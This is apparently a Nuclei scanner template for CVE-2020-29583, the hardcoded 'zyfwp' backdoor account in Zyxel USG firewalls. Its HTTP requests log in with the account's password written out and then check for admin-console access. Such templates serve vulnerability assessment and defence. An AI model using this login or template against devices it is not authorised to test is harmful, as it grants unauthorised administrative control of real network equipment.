54 lines
1.6 KiB
YAML
54 lines
1.6 KiB
YAML
id: CVE-2020-29583
|
|
|
|
info:
|
|
name: ZyXel USG - Hardcoded Credentials
|
|
author: canberbamber
|
|
severity: critical
|
|
description: |
|
|
A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
|
|
reference:
|
|
- https://www.zyxel.com/support/CVE-2020-29583.shtml
|
|
- https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2020-29583
|
|
- https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
|
|
- http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-29583
|
|
cwe-id: CWE-522
|
|
epss-score: 0.95315
|
|
cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
shodan-query: title:"USG FLEX 100"
|
|
vendor: zyxel
|
|
product: usg20-vpn_firmware
|
|
tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
GET /ext-js/index.html HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
cookie-reuse: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body_2
|
|
words:
|
|
- 'data-qtip="Web Console'
|
|
- 'CLI'
|
|
- 'Configuration"></a>'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|